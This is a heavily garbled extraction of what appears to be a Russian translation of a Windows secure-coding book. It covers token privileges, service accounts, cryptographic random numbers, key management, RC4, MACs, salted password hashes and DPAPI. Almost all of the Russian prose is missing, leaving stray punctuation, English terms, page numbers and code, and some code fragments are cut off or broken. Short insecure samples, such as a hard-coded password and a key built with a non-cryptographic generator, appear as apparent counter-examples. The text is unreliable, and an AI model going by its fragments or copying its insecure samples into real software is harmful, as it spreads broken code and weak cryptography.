AdjustTokenPrivileges, ,
SE_PRIVILIGE_REMOVED. :
,
.
,
.
Windows .NET Server 2003 ,
, .
, Win
dows .NET Server 2003, GetVer
sionEx .
, Windows .NET Server 2003 LSA (LSASS.EXE)
, :
SeTakeOwnershipPrivilege;
SeCreatePagefilePrivilege;
SeLockMemoryPrivilege;
SeAssignPrimaryTokenPrivilege;
SeIncreaseQuotaPrivilege;
SeIncreaseBasePriorityPrivilege;
SeCreatePermanentPrivilege;
SeSystemEnvironmentPrivilege;
SeUndockPrivilege;
SeLoadDriverPrivilege;
SeProfileSingleProcessPrivilege;
SeManageVolumePrivilege.
Smartcard :
SeSecurityPrivilege;
SeSystemtimePrivilege;
SeDebugPrivilege;
SeShutdownPrivilege;
SeUndockPrivilege.
211
, ,
SeChangeNotifyPrivilege, NTFS.
:
/*
JettisonPrivs.cpp
*/
#ifndef SE_PRIVILEGE_REMOVED
# define SE_PRIVILEGE_REMOVED (0x00000004)
#endif
#define SAME_LUID(luid1,luid2) \
(luid1.LowPart == luid2.LowPart && \
luid1.HighPart == luid2.HighPart)
DWORD JettisonPrivs() {
DWORD dwError = 0;
VOID* TokenInfo = NULL;
try {
HANDLE hToken = NULL;
if (!OpenProcessToken(
GetCurrentProcess(),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,
&hToken))
throw GetLastError();
DWORD dwSize=0;
if (!GetTokenInformation(
hToken,
TokenPrivileges,
NULL, 0,
&dwSize)) {
dwError = GetLastError();
if (dwError != ERROR_INSUFFICIENT_BUFFER)
throw dwError;
}
TokenInfo = new char[dwSize];
if (NULL == TokenInfo)
throw ERROR_NOT_ENOUGH_MEMORY;
if (!GetTokenInformation(
hToken,
TokenPrivileges,
TokenInfo, dwSize,
&dwSize))
throw GetLastError();
212
II
Windows XP/.NET Server 2003
Windows
, .
,
. (
SeTcbPrivilege, SID SYSTEM SID
), : ,
.
,
. Windows XP
:
(NT AUTHORITY\LocalService);
(NT AUTHORITY\NetworkService).
213
.
,
.
. , BlakeLaptop
LocalService ,
, (
). , ( )
, .
BlakeLaptop NetworkService,
BLAKELAPTOP$.
: Windows 2000/XP
,
$.
ACL ,
.
. 76 ,
Windows .NET Server 2003.
7-6.
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeMachineAccountPrivilege
SeTcbPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeDebugPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
. . .
214
II
()
7-6.
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeSyncAgentPrivilege
SeEnableDelegationPrivilege
, Local System ,
.
?
: NetworkService
, LocalService ,
,
.
! Local System,
,
,
NetworkService LocalService.
7-7.
#define
SE_IMPERSONATE_NAME
SeImpersonatePrivilege
29L
SID :
SYSTEM;
Administrators ();
Service ().
Everyone , Service ,
.
, .
,
.
215
,
(, RPC_C_IMP_LEVEL_IMPERSONATE RPC_C_IMP_LEVEL_DELEGATE).
(
, RPC_C_IMP_LEVEL_ANONYMOUS RPC_C_IMP_LEVEL_IDENTIFY). ,
, ,
.
, .
,
-
,
.
,
.
,
, , , .
:
Windows 95/98/Me,
Windows NT/2000/XP,
;
, ,
.
. Microsoft Windows XP
, ,
,
. ,
ACL ,
Windows XP, Windows 95/98/Me (
).
,
,
.
, Windows 95/98/Me,
Windows NT/2000/XP.
,
. , ,
, . ,
, ,
. , , ,
.
.
Unable to load (
216
II
), ,
. ,
. :
Windows Me, Windows XP
. ,
, ,
, !
C:\Program Files.
,
, .
! ,
.
.
,
:
Event Viewer ( );
RegMon ( http://www.sysinternals.com);
FileMon ( http://www.sysinternals.com).
Windows
,
.
.
,
, . ,
, . Windows 2000/XP
.
1. Mmc.exe.
2. Console1 (1) File (),
Add/Remove Snapin ( ).
3. Add/Remove Snapin ( )
Add () Add Standalone Snapin (
).
4. Group Policy ( ) Add
().
5. Select Group Policy Object ( )
Finish (). Select Group Policy Object (
) Local Computer (
).
217
Event Type:
Failure Audit
Event Source:
Security
Event Category: Privilege Use
Event ID:
578
Date:
5/21/2002
Time:
10:15:00 AM
User:
NORTHWINDTRADERS\blake
Computer:
CHERYL!LAP
Description:
Privileged object operation:
Object Server:
Security
Object Handle:
0
Process ID:
444
Primary User Name: BLAKE!LAP$
Primary Domain:
NORTHWINDTRADERS
Primary Logon ID: (0x0,0x3E7)
Client User Name: blake
Client Domain:
NORTHWINDTRADERS
Client Logon ID:
(0x0,0x485A5)
Privileges:
SeShutdownPrivilege
Blake ,
. ,
.
Regmon FileMon
.
: RegMon FileMon. http://www.sysinternals.com.
ACCDENIED
, ,
218
II
,
.
FAT FAT32
.
NTFS, FAT,
, . FileMon
, . ,
FAT? , GetFileSecurity SetFileSecurity
FAT, . ,
, FAT.
RegMon FileMon
. ,
, .
. 73, 74 75 (. 219221) ,
,
.
!
.
SYS
TEM . ,
?
.
. : , .
,
, , .
,
.
SYSTEM .
, :
,
, ,
.
,
.
: ,
,
.
219
.
,
. 7-4
(-
)
. 73. ,
220
II
RegMon
RegMon
:
,
ACL
.
RegMon
RegMon
RegMon
?
Full Control
Everyone
. 7-5
(-
)
. 74. ,
221
NTFS?
, ,
?
:
FileMon
FileMon
:
,
ACL
.
FileMon
FileMon
?
Full Control Everyone
,
,
,
?
,
?
. 75. ,
: ,
. :
, ,
, . ,
. , !
, .
,
,
.
,
,
, ,
.
,
.
, ,
.
: .
, (nonce)
.
223
.
, .
, ,
, .
,
.
rand
C++,
rand C. ,
C .
rand ,
. rand Rand.c
Microsoft Visual C++ 7 (C Runtime, CRT), (
):
. .
224
II
VBScript
73 22 29 92 19 89 43 29 99 95
: VBScript.
Randomize 4269
For i = 0 to 9
r = Int(100 * Rnd) + 1
WScript.echo(r)
Next
// C/C++
// 52 4 26 66 26 62 2 76 67 66
#include <stdlib.h>
void main() {
srand(12366);
for (int i = 0; i < 10; i++) {
int i = rand() % 100;
printf("%d ", i);
}
}
# Perl 5
# 86 39 24 33 80 85 92 64 27 82
srand 650903;
for (1 .. 10) {
$r = int rand 100;
printf "$r ";
}
// C#
// 39 89 31 94 33 94 80 52 64 31
using System;
class RandTest {
static void Main() {
Random rnd = new Random(1234);
for (int i = 0; i < 10; i++) {
Console.WriteLine(rnd.Next(100));
}
}
}
, . (, ,
,
.)
! ,
CRT rand, , .
,
.
225
, ,
, Netscape Navigator.
: ,
SSL (Secure Sockets Layer),
, SSL.
, !
BugTraq http://online.securityfocus.com/
archive/1/3791.
. , IP
CodeRed .
IP. ,
, , ,
! Web http://www.avp.ch/avpve/worms/iis/
bady.stm.
Texas Hold Em Poker ASF Software.
Reliable Software Technologies ( Cigital http://www.cigital.com)
1999 .
Borland Delphi
, rand CRT. Exploit ,
! Web
http://www.cigital.com/news/gambling.html.
Win32
: rand,
Windows,
CryptGenRandom,
.
WinCrypt.h Windows
, Windows 95 Internet Explorer 3.02
, Windows 98, Windows Me, Windows CE v3, Windows NT 4/2000/XP Win
dows .NET Server 2003.
CryptGenRandom
. 81.
, , ,
, FIPS 1862, 3.1, SHA1,
G.
CryptGenRandom [
(system entropy)], Windows 2000
, :
(GetCurrentProcessID);
(GetCurrentThreadID);
(GetTickCount);
(GetLocalTime);
226
II
CryptGenRandom()
FIPS 186
,
SHA-1
NewGenRandom()
64
RC4
MD4
SHA-1 x 4
RC4
HKLM/Software/Microsoft/
Cryptography/RNG/Seed
. 81.
Windows 2000 .
,
(Query
PerformanceCounter);
MD4 ,
, . MD4 ,
128
;
, RDTSC,
RDMSR, RDPMC ( x86
Web http://developer.intel.com/software/idap/
resources/technical_collateral/pentiumii/RDTSCPM1.HTM);
,
: Idle Process Time, Io Read Transfer Count, I/O Write Transfer Count, I/O Other
Transfer Count, I/O Read Operation Count, I/O Write Operation Count, I/O Other
Operation Count, Available Pages, Committed Pages, Commit Limit, Peak Commi
227
tment, Page Fault Count, Copy On Write Count, Transition Count, Cache Transition
Count, Demand Zero Count, Page Read Count, Page Read I/O Count, Cache Read
Count, Cache I/O Count, Dirty Pages Write Count, Dirty Write I/O Count, Mapped
Pages Write Count, Mapped Write I/O Count, Paged Pool Pages, Non Paged Pool Pages,
Paged Pool Allocated space, Paged Pool Free Space, Non Paged Pool Allocated Space,
Non Paged Pool Free Space, Free System Page Table Entry, Resident System Code
Page, Total System Driver Pages, Total System Code Pages, Non Paged Pool Lookaside
Hits, Paged Pool Lookaside Hits, Available Paged Pool Pages, Resident System Cache
Page, Resident Paged Pool Page, Resident System Driver Page, Cache/Fast Read with
No Wait, Cache/Fast Read with Wait, Cache/Fast Read Resource Missed, Cache/Fast
Read Not Possible, Cache/Fast Memory Descriptor List Read with No Wait, Cache/
Fast Memory Descriptor List Read with Wait, Cache/Fast Memory Descriptor List Read
Resource Missed, Cache/Fast Memory Descriptor List Read Not Possible, Cache/Map
Data with No Wait, Cache/Map Data with Wait, Cache/Map Data with No Wait Miss,
Cache/Map Data Wait Miss, Cache/PinMapped Data Count, Cache/PinRead with
No Wait, Cache/Pin Read with Wait, Cache/PinRead with No Wait Miss, Cache/Pin
Read Wait Miss, Cache/CopyRead with No Wait, Cache/CopyRead with Wait, Cache/
CopyRead with No Wait Miss, Cache/CopyRead with Wait Miss, Cache/Memory
Descriptor List Read with No Wait, Cache/Memory Descriptor List Read with Wait,
Cache/Memory Descriptor List Read with No Wait Miss, Cache/Memory Descriptor
List Read with Wait Miss, Cache/Read Ahead IOs, Cache/LazyWrite IOs, Cache/Lazy
Write Pages, Cache/Data Flushes, Cache/Data Pages, Context Switches, First Level
Translation Buffer Fills, Second Level Translation buffer Fills System Calls;
, :
Alignment Fix Up Count, Exception Dispatch Count, Floating Emulation Count
Byte Word Emulation Count;
, , : Current
Depth, Maximum Depth, Total Allocates, Allocate Misses, Total Frees, Free Misses,
Type, Tag Size;
, :
Context Switches, Deferred Procedure Call Count, Deferred Procedure Call Rate, Time
Increment, Deferred Procedure Call Bypass Count Asynchronous Procedure Call
Bypass Count;
, : Next
Entry Offset, Number Of Threads, Create Time, User Time, Kernel Time, Image Name,
Base Priority, Unique Process ID, Inherited from Unique Process ID, Handle Count,
Session ID, Page Directory Base, Peak Virtual Size, Virtual Size, Page Fault Count,
Peak Working Set Size, Working Set Size, Quota Peak Paged Pool Usage, Quota Paged
Pool Usage, Quota Peak Non Paged Pool Usage, Quota Non Paged Pool Usage, Page
file Usage, Peak Page file Usage, Private Page Count, Read Operation Count, Write
Operation Count, Other Operation Count, Read Transfer Count, Write Transfer Count
Other Transfer Count.
SHA1, 20
(seed value),
FIPS 1862, 3.1.
228
II
,
(
CryptGenRandom Platform SDK). ,
,
, .
CryptGenRandom :
#include <windows.h>
#include <wincrypt.h>
M
HCRYPTPROV hProv = NULL;
BOOL fRet = FALSE;
BYTE pGoop[16];
DWORD cbGoop = sizeof pGoop;
if (CryptAcquireContext(&hProv,
NULL, NULL,
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT))
if (CryptGenRandom(hProv, cbGoop, &pGoop))
fRet = TRUE;
if (hProv) CryptReleaseContext(hProv, 0);
C++ CCryptRandom ,
CryptAcquireContext ( ) CryptReleaseContext,
(Cryptographic Service Provider, CSP),
. , CcryptRandom,
.
/*
CryptRandom.cpp
*/
#include <windows.h>
#include <wincrypt.h>
#include <iostream.h>
class CCryptRandom {
public:
CCryptRandom();
virtual ~CCryptRandom();
BOOL get(void *lpGoop, DWORD cbGoop);
private:
HCRYPTPROV m_hProv;
};
CCryptRandom::CCryptRandom() {
m_hProv = NULL;
CryptAcquireContext(&m_hProv,
NULL, NULL,
229
PROV_RSA_FULL, CRYPT_VERIFYCONTEXT);
if (m_hProv == NULL)
throw GetLastError();
}
CCryptRandom::~CCryptRandom() {
if (m_hProv) CryptReleaseContext(m_hProv, 0);
}
BOOL CCryptRandom::get(void *lpGoop, DWORD cbGoop) {
if (!m_hProv) return FALSE;
return CryptGenRandom(m_hProv, cbGoop,
reinterpret_cast<LPBYTE>(lpGoop));
}
void main() {
try {
CCryptRandom r;
// 10 099.
for (int i=0; i<10; i++) {
DWORD d;
if (r.get(&d, sizeof d))
cout << d % 100 << endl;
}
} catch (...) {
// .
}
}
Secureco2\Chapter08.
, CryptGenRandom,
, !
Crypt
AcquireContext,
, .
FIPS 140-1
FIPS 1401 (Federal Infor
mation Processing Standard)
.
. FIPS 1401 Web http://
www.microsoft.com/technet/security/FIPSFaq.asp.
, ,
, FIPS 1401.
, rand . CryptGenRandom
Windows 2000 FIPS.
230
II
, , ,
, rand C:
// .
byte[] key = new byte[32];
new Random().NextBytes(key);
, C#, 32
:
using System.Security.Cryptography;
try {
byte[] b = new byte[32];
new RNGCryptoServiceProvider().GetBytes(b);
// .
for (int i = 0; i < b.Length; i++)
Console.Write("{0} ", b[i].ToString("x"));
} catch(CryptographicException e) {
Console.WriteLine(e.Message);
}
RNGCryptoServiceProvider CryptoAPI, Crypt
GenRandom, . Visual Ba
sic .NET :
Imports System.Security.Cryptography
Dim b(32) As Byte
Dim i As Short
Try
Dim r As New RNGCryptoServiceProvider()
r.GetBytes(b)
For i = 0 To b.Length ! 1
Console.Write("{0}", b(i).ToString("x"))
Next
Catch e As CryptographicException
Console.WriteLine(e.Message)
End Try
Web-
ASP.NET ,
, . COM
Web GetRandom Utilities
231
CAPICOM v2. ,
ASP, VBScript (Visual Basic Scrip
ting Edition):
<%
set oCC = CreateObject("CAPICOM.Utilities.1")
strRand = oCC.GetRandom(32,!1)
strRand.
strRand 32 Base64.
%>
: GetRandom CAPICOM 2, 1
. CAPICOM : http://www.microsoft.com/
downloads/release.asp?ReleaseID=39546.
, ,
.
, ,
,
. ,
DES (Data Encryption Standard), 56 .
DES
0 2561 ( 0 72 057 594 037 927 899).
ASCII, AZ, az, 09,
,
.
, DES ,
, 0 2561.
,
ASCII, .
, Perl. 2001 .
Fun With Perl (http://www.technofile.org/depts/mlists/
fwp.html) ,
. :
(Claude Shannon),
1948 . (A Mathematical
232
II
Theory of Communication), .
, ,
log2(nm), n
, m . VBSctipt ,
:
#include <math.h>
#include <stdio.h>
double EntropyBits(double valid, double size) {
return valid ? size * log(valid) / log(2):0;
}
void main() {
printf("%f", EntropyBits(62, 8));
}
!
, ,
. , (Major),
Maj0r, ,
.
(social engineering).
, ,
.
, PIN 24601,
, .
, . ,
DES 56
. . 81,
,
56 128 .
233
8-1.
56-
128-
PIN
10 (09)
17
40
26 (AZ az)
12
28
52 (AZ az)
10
23
52 (AZ, az 09)
10
22
20
,
, ,
(. 82).
. 82.
! ,
.
, ,
.
http://www.ftp.cl.cam.ac.uk/ftp/users/rja14/tr500.pdf,
The Memorability and Security of Passwords Some Empirical
Results (
).
234
II
,
.
, ,
.
. ,
,
.
DVD:
, exploit,
, DVD Xing
DVD Player RealNetworks Inc, Xing Technologies.
DVD ,
DeCSS,
DVD. http://www.cnn.com/TECH/computing/9911/05/
dvd.hack.idg.
This1sAPa$sword, ,
,
( Strings), EXE DLL
.
. : .
, :
// !!!! .
char *szPassword="&162hV1);sWa1";
, ,
? Strings ,
ASCII. !
. ,
, .
nCipher (http://
www.ncipher.com).
.
, , ,
SSL/TLS. !
Playing Hide and Seek with Stored Keys ( ) http://
www.ncipher.com/products/rscs/downloads/whitepapers/keyhide2.pdf. nCipher
, .
235
9.
! ,
(RC) .
. , ,
.
: .
, (ephemeral),
, IPSec, SSL/TLS, RPC DCOM.
.
,
(nonrepudiation),
. , SSL/TLS
. ,
, .
,
,
, . ,
.
, .
.
, , .
. ,
DES RC4, . RSA (
), ,
.
(factoring). ,
112 3DES , 512 RSA,
. ,
, 112
3DES.
Cryptographic Challenges (
) Web http://www.rsasecurity.com/rsalabs/challenges.
DES RSA
.
, ,
, .
236
II
8-2.
,
RSA,
DSA,
70
947
128
80
1228
145
90
1553
153
100
1926
184
150
4575
279
200
8719
373
250
14596
475
, 80 RSA
1228 . ,
RSA, 80 .
! 128 AES 512 RSA
.
,
, ,
. :
. :
. : , ,
. , ,
. , ,
, ,
(. 83).
. 83
, . GetKey
EncryptWithKey, Encrypt, DoWork Encrypt
Data. ,
.
. GetKeyHandle
(handle) , EncryptData.
.
, .
D.EXE
237
D.EXE
szKey = GetKey("MyKey");
C.EXE
hKey = GetKey("MyKey");
C.EXE
EncryptWithKey(szKey);
B.DLL
EncryptWithKeyHandle(hKey);
B.DLL
Encrypt(szKey);
A.DLL
Encrypt(hKey);
A.DLL
DoWork(szKey);
DoWork(hKey);
EncryptData(szKey);
EncryptData(hKey);
. 83. ,
! , ,
, ,
.
CryptGenKey CryptExportKey
Microsoft CryptoAPI CryptGenKey,
,
.
CryptoAPI, .
,
, CryptExportKey
CryptImportKey.
( ),
( Windows 2000 ).
(plaintext), . .
. CryptoAPI,
.
C++, ,
:
238
II
/*
ProtectKey.cpp
*/
#include "stdafx.h"
using namespace std;
// , .
void GetExchangeKey(HCRYPTPROV hProv, HCRYPTKEY *hXKey) {
// .
HCRYPTHASH hHash;
BYTE bKey[16];
if (!GetKeyFromStorage(bKey, sizeof bKey))
throw GetLastError();
if (!CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash))
throw GetLastError();
if (!CryptHashData(hHash, bKey, sizeof bKey, 0))
throw GetLastError();
if (!CryptDeriveKey(hProv, CALG_3DES, hHash, CRYPT_EXPORTABLE,
hXKey))
throw GetLastError();
}
void main() {
HCRYPTPROV
hProv = NULL;
HCRYPTKEY hKey = NULL;
HCRYPTKEY hExchangeKey = NULL;
LPBYTE
pbKey = NULL;
try {
if (!CryptAcquireContext(&hProv, NULL, NULL,
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT))
throw GetLastError();
// 3DES! .
// : CryptoAPI.
if (!CryptGenKey(hProv, CALG_3DES, CRYPT_EXPORTABLE, &hKey))
throw GetLastError();
// , 3DES!.
GetExchangeKey(hProv, &hExchangeKey);
// (BLOB).
DWORD dwLen = 0;
if (!CryptExportKey(hKey, hExchangeKey,
SYMMETRICWRAPKEYBLOB,
239
0, pb Key, &dwLen))
throw GetLastError();
pbKey = new BYTE[dwLen]; // 3DES!.
ZeroMemory(pbKey, dwLen);
if(!pbKey)throwError_NOT_ENOUGH_MEMORY;
// .
if (!CryptExportKey(hKey, hExchangeKey,
SYMMETRICWRAPKEYBLOB, 0, pbKey, &dwLen))
throw GetLastError();
cout << ", " << dwLen
<< " ."
<< endl;
// Key.bin;
// ostream::write()
// <<, NULL!.
ofstream file("c:\\keys\\key.bin", ios_base::binary);
file.write(reinterpret_cast<const char *>(pbKey ), dwLen);
file.close();
} catch(DWORD e) {
cerr << " " << e << hex << " " << e << endl;
}
//
if
if
if
if
.
(hExchangeKey)
CryptDestroyKey(hExchangeKey);
(hKey)
CryptDestroyKey(hKey);
(hProv)
CryptReleaseContext(hProv, 0);
(pbKey)
delete [] pbKey;
}
Secureco2\Chapter08. ,
GetExchangeKey ,
.
, , !
3DES. 3DES ,
. , DES.
. ,
,
. ,
,
. ,
240
II
(spoofing),
. :
, ,
.
,
.
! ,
( !). :
? ,
, .
, .
,
. , ,
( , ),
( 9).
( ,
, , )* .
, , .
,
, .
IPSec Windows 2000 . . 84
,
.
. 84.
,
, ,
sneakernet, sneaker net . . .
241
, , ,
. ,
, . , SSL/TLS IPSec
.
, .
: ,
,
(Diffie Hellman) RSA.
. ,
, .
, : ,
. !
, ,
, , .
,
. , :
242
II
,
.
XOR
, XOR, .
( )
:
A B A = B
. XOR ,
. XOR
, .
, !
JScript, CAPICOM,
, .
var
var
var
var
CAPICOM_ENCRYPTION_ALGORITHM_RC2 = 0;
CAPICOM_ENCRYPTION_ALGORITHM_RC4 = 1;
CAPICOM_ENCRYPTION_ALGORITHM_DES = 2;
CAPICOM_ENCRYPTION_ALGORITHM_3DES = 3;
243
. DLL
Web http://www.microsoft.com/downloads/release.asp?relea
seid=39546.
!
. , .
Win32 CryptoAPI,
(VBScript, JScript ASP) CAPICOM. .NET
( ASP.NET)
System.Security.Cryptography.
.
. 256
, ,
, ?
, . ,
256 , ?
? ,
. ,
, , .
,
.
(stream cipher)
, 1 . (RC4
.
, ,
CryptoAPI Windows.) , ,
,
. ,
;
. XOR
, .
: XOR
.
, .
(, RSA), ,
. : DES, 3DES, AES (Advan
ced Encryption Standard, DES), IDEA [ Pretty Good
244
II
,
. , 13 , 13
. DES, 64 , 13
16 . 3
, DES 64 .
, 13 DES ,
5 3 ( , ),
8 .
, , ,
, !
.
RC4 10 DES.
, .
.
,
.
, , .
,
.
,
. ,
.
.
,
XOR . ,
, . , , .
: ,
. , 23
, 23 .
, ,
CryptoAPI:
/*
RC4Test.cpp
*/
#define MAX_BLOB 50
BYTE bPlainText1[MAX_BLOB];
BYTE bPlainText2[MAX_BLOB];
BYTE bCipherText1[MAX_BLOB];
245
BYTE bCipherText2[MAX_BLOB];
BYTE bKeyStream[MAX_BLOB];
BYTE bKey[MAX_BLOB];
//////////////////////////////////////////////////////////////////
// 2
// .
void Setup() {
ZeroMemory(bPlainText1, MAX_BLOB);
ZeroMemory(bPlainText2, MAX_BLOB);
ZeroMemory(bCipherText1, MAX_BLOB);
ZeroMemory(bCipherText2, MAX_BLOB);
ZeroMemory(bKeyStream, MAX_BLOB);
ZeroMemory(bKey, MAX_BLOB);
strncpy(reinterpret_cast<char*>(bPlainText1),
", 6 .", MAX_BLOB!1);
strncpy(reinterpret_cast<char*>(bPlainText2),
" .", MAX_BLOB!1);
strncpy(reinterpret_cast<char*>(bKey),
GetKeyFromUser(), MAX_BLOB!1);
// .
}
//////////////////////////////////////////////////////////////////
// Encrypt RC4.
void Encrypt(LPBYTE bKey,
LPBYTE bPlaintext,
LPBYTE bCipherText,
DWORD dwHowMuch) {
HCRYPTPROV hProv;
HCRYPTKEY hKey;
HCRYPTHASH hHash;
/*
:
.
"".
, !.
3 .
.
4 .
*/
DWORD dwBuff = dwHowMuch;
CopyMemory(bCipherText, bPlaintext, dwHowMuch);
if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT))
throw;
246
II
247
.
. , E, T
A. , (
) . (, , .)
,
(DES 3DES).
. ,
( ) .
. ,
,
,
.
,
, :
, ! ,
,
.
(salt) , ,
.
.
UNIX
.
( /etc/passwd).
.
, ! Windows
, Windows 2000
,
. Windows NT 4.0 SP 3
Syskey ( ).
CryptoAPI,
.
248
II
;
, .
! .
,
,
.
,
.
, .
,
, .
,
, .
.NET Framework .
, ,
.
, , ,
XOR ,
. (bit
flip). 1
, , . ,
, .
, , :
16:00 03!Sep!2004. . .
, ,
.
,
3 2004 4 . , , ,
, .
( , )
249
, , .
( 16:00),
. !
( ).
. ,
, ,
. , .
, ,
, . 85.
, ,
,
. 85. ,
: ,
,
. ,
.
.
(keyed hash)
, .
.
, .
(message authentication code, MAC). Web
What are Message Authentication Codes (
) (http://www.rsasecurity.com/rsalabs/
faq/217.html).
250
II
. 86 .
MAC
MAC
MAC-
. 86.
MAC-
, .
, ,
.
, ,
. .
!
. (1),
(2), 1,
, 2, . 1,
.
2 1
,
(, ). :
!
CryptoAPI, .NET Framework
. CryptoAPI,
HMAC (HashBased Message Authentication Code).
Secureco2\Chapter08\MAC. HMAC RFC 2104
(http://www.ietf.org/rfc/rfc2104.txt).
/*
MAC.cpp
*/
#include "stdafx.h"
251
252
II
if (NULL == *pbHMAC)
throw;
if(!CryptGetHashParam(hHash, HP_HASHVAL, *pbHMAC, &cbHMAC, 0))
throw;
SetLastError()
} catch(...) {
dwErr = GetLastError();
printf(" ! %d\n", GetLastError());
}
if
if
if
if
(hProv)
(hKeyHash)
(hKey)
(hHash)
CryptReleaseContext(hProv, 0);
CryptDestroyKey(hKeyHash);
CryptDestroyKey(hKey);
CryptDestroyHash(hHash);
return dwErr;
}
void main() {
// .
char *szKey = GetKeyFromUser();
DWORD cbKey = lstrlen(szKey);
if (cbKey == 0) {
printf(" .\n");
return !1;
}
char *szData = "! ...";
DWORD cbData = lstrlen(szData);
// HMAC pbHMAC.
// HMAC ! cbHMAC .
LPBYTE pbHMAC = NULL;
DWORD cbHMAC = 0;
DWORD dwErr = HMACStuff(szKey, cbKey,
szData, cbData,
&pbHMAC, &cbHMAC);
// ! pbHMAC.
delete [] pbHMAC;
}
.NET Framework , ,
, .
253
key () message ()
, hash HMAC.
! ,
.NET Framework. ,
.
MAC,
:
. MAC
;
MAC ;
(nonrepu
diation) ( ). MAC
,
MAC;
, MAC ( ).
,
, , MAC.
. 87.
. 87.
, ,
( ,
, , !).
.
254
II
CAPICOM
. VBScript ,
:
!
MAC .
, .
. .
, ,
, . (
,
.) :
, , !
:
255
1. ;
2. ;
3. .
. ,
:
1. ;
2. ;
3. .
!
IIS 4. , SSL
,
.
: (, , )
. , , .
, . Web
http://www.microsoft.com/technet/security/bulletin/MS99053.asp.
, ,
, .
, , ,
, ,
. :
, ,
. . 83 , , ,
.
256
II
8-3.
RC2, RC4, DES, 3DES, AES
( Rijndael)
SHA1, SHA256, SHA384, SHA512,
MD4, MD5, HMAC,
, RSA DSS, XML DSig
MAC
. ,
, . ,
, ,
,
.
, ,
: MD4 MD5.
? . ,
. , MD4 MD5
, . ,
, .
,
,
.
,
API
. .
. ,
? ,
, .
, ,
, . ,
,
.
, .
, ,
. ,
,
. : , ,
( ) ,
,
Microsoft Windows, ,
,
, ,
.
,
(persistent) . (ephemeral) ,
, .
SSL/TLS, IPSec, RPC DCOM
. .
! .
,
. : ,
, .
258
II
, :
( ) .
, . , ,
Blake, Blake.
, (spoofing) .
,
, ,
.
, , .
, ?
? ? ,
.
, , ,
. (, , ?) ,
,
, .
.
() .
,
, . .
Windows NT
, Debug programs (
). Microsoft Platform SDK
SeDebugPrivilege SE_DEBUG_NAME.
, .
.
. Pagefile.sys,
.
: Hiberfil.sys,
, .
, ,
, (, Dr. Wat
son) . ,
.
: ,
, , .
, , , ,
.
,
( ), ,
(verifier),
259
. ,
,
, , , .
, .
,
( ) .
(hash function), (digest function),
,
. ,
, .
128 160 , . ,
RSA Data Security Inc. MD5
128 , SHA1 [
(National Institute of Standards and Technology, NIST)
(National Security Agency, NSA)]
160 . ( SHA1.
NIST SHA1: SHA256, SHA384
SHA512. Microsoft CryptoAPI MD4, MD5 SHA1, .NET
Framework MD5, SHA1, SHA256, SHA384 SHA512. (
SHA Web csrc.nc
sl.nist.gov/cryptval/shs.html.)
,
,
.
( .
, ,
.) ,
, .
, .
(salt) ,
,
. (dictionary attack)
, ,
, .
,
(
8).
CryptoAPI . C/C++:
260
II
// .
if (!CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash))
throw GetLastError();
if (!CryptHashData(hHash, (LPBYTE)bSecret, cbSecret, 0))
throw GetLastError();
if (!CryptHashData(hHash, (LPBYTE)bSalt, cbSalt, 0))
throw GetLastError();
// .
DWORD cbSaltedHash = 0;
DWORD cbSaltedHashLen = sizeof (DWORD);
if (!CryptGetHashParam(hHash, HP_HASHSIZE, (BYTE*)&cbSaltedHash,
&cbSaltedHashLen, 0))
throw GetLastError();
// .
BYTE *pbSaltedHash = new BYTE[cbSaltedHash];
if (NULL == *pbSaltedHash) throw;
if(!CryptGetHashParam(hHash, HP_HASHVAL, pbSaltedHash,
&cbSaltedHash, 0))
throw GetLastError();
, C#:
using System;
using System.Security.Cryptography;
using System.IO;
using System.Text;
...
static byte[] HashPwd(byte[] pwd, byte[] salt) {
SHA1 sha1 = SHA1.Create();
UTF8Encoding utf8 = new UTF8Encoding();
CryptoStream cs =
new CryptoStream(Stream.Null, sha1, CryptoStreamMode.Write);
cs.Write(pwd,0,pwd.Length);
cs.Write(salt,0,salt.Length);
cs.FlushFinalBlock();
return sha1.Hash;
}
Secureco2\Chapter09\Sal
tedHash. , , :
, ,
. CryptGetHashParam
Windows API
, , .
, .
, ,
(). ,
, .
261
.
.
PKCS #5
,
.
PKCS #5 (PublicKey Cryptography Standard).
, RSA Data Security
, Microsoft, Apple Sun Microsystems. PKCS #5
RFC 2898 (http://www.ietf.org/rfc/rfc2898.txt).
PKCS#5
. , , PBKDF1 (Password
Based Key Derivation Function #1) PKCS #5.
, PBKDF2, :
. , PKCS #5,
PBKDF1.
PKCS #5 ,
.
,
.
, , ,
PKCS #5.
,
.
1. .
2. .
3. .
4. .
5. PKCS #5.
, 64 , ,
, 264 ( 263,
, ,
). , .
,
PKCS #5. ,
PKCS #5 .
,
, .
C#
:
262
II
: CryptoAPI Windows
PKCS #5, CryptDeriveKey,
.
,
.
! :
! , PKCS #5
, ,
.
.
,
. ? , ,
.
, ,
.
, .
, ,
,
.
. ,
, (
) ,
.
,
.
Windows 2000
Windows 2000
CryptProtectData CryptUnprotectData API DPAPI (Data Protection
API). DPAPI :
. CRYPTPROTECT_LO
CAL_MACHINE dwFlags,
ACL , , ,
DPAPI. ,
Accounting (), ACL
:
263
DPAPI
. DPAPI
, ?
. . CryptProtectData CRYPTPROTECT_LO
CAL_MACHINE ,
. ,
, CryptProtectData.
,
(ACL),
pOptionalEntropy.
DPAPI
. ( )
, ?
.
, ,
, .
CryptProtecData pOptionalEntropy
, ,
.
, CryptUnprotectData
, !
264
II
( 16 ),
/
.
! CRYPTPROTECT_LOCAL_MA
CHINE, .
,
,
.
, ,
SYSTEM, Windows 2000/XP LsaStore
PrivateData LsaRetrievePrivateData API
LSA.
, LSA 4096 ,
(2048) . ,
. DPAPI. LSA
Windows NT 4.
,
